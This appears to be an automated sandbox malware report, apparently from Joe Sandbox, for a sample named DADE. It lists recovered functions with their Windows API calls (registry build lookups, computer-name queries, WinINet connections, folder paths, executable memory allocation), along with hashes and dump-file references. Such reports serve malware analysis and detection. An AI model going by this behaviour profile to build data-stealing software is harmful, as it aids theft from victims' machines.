Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

Function 00404AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800,00A76950), ref: 00404B17
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
InternetCrackUrlA.WININET(?,00000000), ref: 00404B47

Strings

<, xrefs: 00404B07

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

Function 004228B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
HeapAlloc.KERNEL32(00000000), ref: 004228CC
RegOpenKeyExA.KERNEL32(80000002,00A79FC8,00000000,00020119,00422849), ref: 004228EB
RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
RegCloseKey.ADVAPI32(00422849), ref: 0042290F

Strings

CurrentBuildNumber, xrefs: 004228FF

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0

Function 00422820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
HeapAlloc.KERNEL32(00000000), ref: 0042283C

Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,00A79FC8,00000000,00020119,00422849), ref: 004228EB
Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F

RegOpenKeyExA.KERNEL32(80000002,00A79FC8,00000000,00020119,?), ref: 00422871
RegQueryValueExA.KERNEL32(?,00A7E4B8,00000000,00000000,00000000,000000FF), ref: 0042288C
RegCloseKey.ADVAPI32(?), ref: 00422896

Strings

Windows 11, xrefs: 00422850

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4

Function 0041EFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F013
StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F

Strings

ERROR, xrefs: 0041F028, 0041F089

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798

Function 00422A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1

Function 00A596D6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A596FE
Module32First.KERNEL32(00000000,00000224), ref: 00A5971E

Memory Dump Source

Source File: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a58000_DADE.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1b1fce23953554cfb7f58203b59b9f975139bbc51379ade8ed28d006f94e305b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 48F0C231100310ABDB203BB5988CB6B76E8FF49322F100529FA42994C0DB70E8498A60

Function 009D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,009D0223,?,?), ref: 009D0E19
SetErrorMode.KERNEL32(00000000,?,?,009D0223,?,?), ref: 009D0E1E

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 73589451eedafcd612fbb6da3bed014ce118f5ec752f8284b0a0a767950f6234
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 83D0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5

Function 0041EF30 Relevance: 1.3, APIs: 1, Instructions: 50stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795

Function 00A59395 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A593E6

Memory Dump Source

Source File: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a58000_DADE.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 67c86e26ec07e1bfc2bf7f3d37245fd07700add9307691e5754d00714848fef0
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3D113F79A00208EFDB01DF98C985E99BBF5BF08351F058094F9489B362D375EA54DF80

Non-executed Functions

Function 009E7047 Relevance: 147.8, APIs: 83, Strings: 1, Instructions: 752stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E707C
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009E70AF
lstrcpy.KERNEL32(00000000,00000000), ref: 009E70E9
lstrcpy.KERNEL32(00000000,00000000), ref: 009E7110
lstrcat.KERNEL32(00000000,00000000), ref: 009E711B
lstrcpy.KERNEL32(00000000,00000000), ref: 009E7144
lstrlen.KERNEL32(00435320), ref: 009E715E
lstrcpy.KERNEL32(00000000,00000000), ref: 009E7180
lstrcat.KERNEL32(00000000,00435320), ref: 009E718C
lstrcpy.KERNEL32(00000000,00000000), ref: 009E71B7
lstrcpy.KERNEL32(00000000,00000000), ref: 009E71E7
LocalAlloc.KERNEL32(00000040,?), ref: 009E721C
strtok_s.MSVCRT ref: 009E7249
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E72B4

Strings

hSC, xrefs: 009E7651, 009E7654, 009E76CD

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
String ID: hSC
API String ID: 922491270-3351665975
Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction ID: 069a7a6d3d8e7d30e2d213424abf14c46bb19044761b8bf77eacb22693b45531
Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction Fuzzy Hash: FE42D370A04345ABCB22AFB5DC88BAEBBBAEF44704F145419F801E7251DB78DD01DBA1

Function 009D6267 Relevance: 128.6, APIs: 68, Strings: 5, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 009D6296
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D62E9
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D631C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D634C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D6387
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D63BA
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009D63CA

Strings

", xrefs: 009D682E, 009D691C
TPC, xrefs: 009D68C0
TPC, xrefs: 009D6868
TPC, xrefs: 009D67D2
------, xrefs: 009D64F0, 009D651D, 009D6795, 009D6886

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$TPC$TPC$TPC
API String ID: 2041821634-3953685780
Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction ID: baf60b3f12b47a3705eaf27af8e06d5587104c1c30c18117ab1899b61d294146
Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction Fuzzy Hash: 62524F719402559FDB20AFB4DC85BAEB7BAEF89304F148426F905A7351DB78EC01CBA0

Function 009D4DE7 Relevance: 116.3, APIs: 61, Strings: 5, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 009D4E16
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4E69
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4E9C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4ECC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4F0A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D4F3D
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009D4F4D

Strings

TPC, xrefs: 009D535F
", xrefs: 009D53BB, 009D54A9
TPC, xrefs: 009D544D
------, xrefs: 009D5073, 009D50A0, 009D5322, 009D5413
TPC, xrefs: 009D53F5

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$TPC$TPC$TPC
API String ID: 2041821634-3953685780
Opcode ID: fc918d25f8641a10a775b0c0162546dc86047189a09e5eab3f081bd063b908de
Instruction ID: 85dee89a587c0e9754f23e1413e92dfd14bd3ec45e9a22b1520f15d6656c8a6c
Opcode Fuzzy Hash: fc918d25f8641a10a775b0c0162546dc86047189a09e5eab3f081bd063b908de
Instruction Fuzzy Hash: 3752717194061A9FDB10AFB4CC85BAEBBB9EF84304F158426F904AB351DB74DD42CBA0

Function 009E7260 Relevance: 114.3, APIs: 64, Strings: 1, Instructions: 526stringmemoryencryptionCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E72B4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E72E4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7316
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 009E7323
RtlAllocateHeap.NTDLL(00000000), ref: 009E732A
StrStrA.SHLWAPI(00000000,00435350), ref: 009E7341
lstrlen.KERNEL32(00000000), ref: 009E734C
malloc.MSVCRT ref: 009E7356
strncpy.MSVCRT ref: 009E7364
lstrcpy.KERNEL32(00000000,00000000), ref: 009E738F
lstrcpy.KERNEL32(00000000,00000000), ref: 009E73B6
StrStrA.SHLWAPI(00000000,00435358), ref: 009E73C9
lstrlen.KERNEL32(00000000), ref: 009E73D4
malloc.MSVCRT ref: 009E73DE
strncpy.MSVCRT ref: 009E73EC
lstrcpy.KERNEL32(00000000,00000000), ref: 009E7417
